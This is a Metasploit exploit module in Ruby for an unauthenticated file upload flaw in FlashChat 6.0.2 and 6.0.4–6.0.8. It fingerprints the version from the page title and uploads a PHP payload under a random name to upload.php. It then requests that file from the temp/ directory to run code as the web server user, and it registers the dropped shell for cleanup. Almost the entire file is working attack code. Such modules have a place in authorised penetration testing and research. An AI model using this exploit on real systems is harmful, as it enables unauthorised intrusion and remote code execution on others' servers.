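##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # Kept for compatibility; no method in this file calls into it.
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Versions whose upload.php is known (per the references below) to accept an
  # unauthenticated .php upload. 6.0.3 is deliberately absent.
  VULNERABLE_VERSIONS = %w[6.0.2 6.0.4 6.0.5 6.0.6 6.0.7 6.0.8].freeze

  # Highest version this module covers; anything newer is reported Safe.
  LAST_AFFECTED_VERSION = '6.0.8'.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "FlashChat Arbitrary File Upload",
      'Description'    => %q{
        This module exploits a file upload vulnerability found in FlashChat
        versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload
        feature in order to upload malicious PHP files without authentication
        which results in arbitrary remote code execution as the web server user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'x-hayben21', # Discovery and PoC
          'bcoles'      # Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '98233'],
          ['EDB', '28709']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Arch'           => ARCH_PHP,
      'Platform'       => 'php',
      'Targets'        =>
        [
          # Tested on FlashChat version 6.0.8
          [ 'Generic (PHP Payload)', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-10-04',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to FlashChat', '/chat/'])
      ])
  end

  #
  # Checks if target is running FlashChat versions 6.0.2, 6.0.4 to 6.0.8
  #
  # The version is read from the "<title>FlashChat vX.Y.Z" banner on the
  # base page and compared as a version, not as a string.
  #
  # Returns:
  #   Appears  - banner version is one of VULNERABLE_VERSIONS
  #   Detected - FlashChat found, version <= 6.0.8 but not a listed one
  #              (e.g. 6.0.3, 6.0.1), i.e. untested
  #   Safe     - version newer than 6.0.8
  #   Unknown  - no response, no banner, or an unparseable version string
  #
  def check
    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, '') })

    unless res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    version = res.body.to_s.scan(/<title>FlashChat v([\d\.]+)/).flatten.first.to_s
    return Exploit::CheckCode::Unknown if version.empty?

    vprint_status("Version found: #{version}")

    # The capture group is [\d.]+ and may be malformed (e.g. a trailing dot);
    # bail out instead of letting Rex::Version.new raise.
    unless Rex::Version.correct?(version)
      vprint_error("Unrecognised version string: #{version}")
      return Exploit::CheckCode::Unknown
    end

    ver = Rex::Version.new(version)

    # Version-aware comparison: a lexicographic `version <= "6.0.8"` would
    # classify 6.0.10 or 10.0.1 as older than 6.0.8.
    if VULNERABLE_VERSIONS.any? { |v| ver == Rex::Version.new(v) }
      Exploit::CheckCode::Appears
    elsif ver <= Rex::Version.new(LAST_AFFECTED_VERSION)
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  #
  # Uploads our malicious file
  # Stolen from havalite_upload_exec.rb
  #
  # base - the FlashChat base path (TARGETURI)
  #
  # POSTs a multipart form with a single "file" part holding the PHP payload
  # under a random .php name to <base>/upload.php. Returns that file name;
  # exec expects the server to have stored it beneath <base>/temp/.
  #
  # Raises via fail_with on no response (Unreachable), 404 (NotFound) or 500
  # (UnexpectedReply). Any other status is logged but not fatal, matching the
  # original behaviour; exec reports a 404 if the file did not land.
  #
  def upload(base)
    # 6..15 random alphanumeric characters, as rand(10)+6 produced
    fname = "#{rand_text_alphanumeric(rand(6..15))}.php"
    php = "<?php #{payload.encoded} ?>"

    data = Rex::MIME::Message.new
    data.add_part(php, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{fname}\"")

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(base, 'upload.php'),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data.to_s
    })

    fail_with(Failure::Unreachable, "#{peer} - Request timed out while uploading") unless res

    code = res.code.to_i
    if code == 404
      fail_with(Failure::NotFound, "#{peer} - No upload.php found")
    elsif code == 500
      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{fname}")
    elsif code != 200
      vprint_warning("Unexpected HTTP #{code} from upload.php, continuing")
    end

    fname
  end

  #
  # Executes our uploaded malicious file
  # Stolen from havalite_upload_exec.rb
  #
  # base          - the FlashChat base path
  # payload_fname - name returned by upload
  #
  # Requests <base>/temp/<payload_fname>. Only an explicit 404 is fatal; a
  # missing response is deliberately not, because the request that runs the
  # PHP payload may never return (presumably while a session is being set
  # up), so do not add a timeout check here.
  #
  def exec(base, payload_fname)
    res = send_request_raw({
      'uri' => normalize_uri(base, 'temp', payload_fname)
    })

    return unless res && res.code == 404

    fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
  end

  # Upload the payload, register it for cleanup, then request it to run it.
  def exploit
    base = target_uri.path

    print_status("Uploading malicious file...")
    fname = upload(base)

    # NOTE(review): only the bare file name is registered, although exec
    # fetches it from temp/. Cleanup therefore relies on the PHP payload's
    # working directory being that temp/ directory -- confirm on a live
    # target before trusting FileDropper to remove the web shell.
    register_files_for_cleanup(fname)

    print_status("Executing #{fname}...")
    exec(base, fname)
  end
end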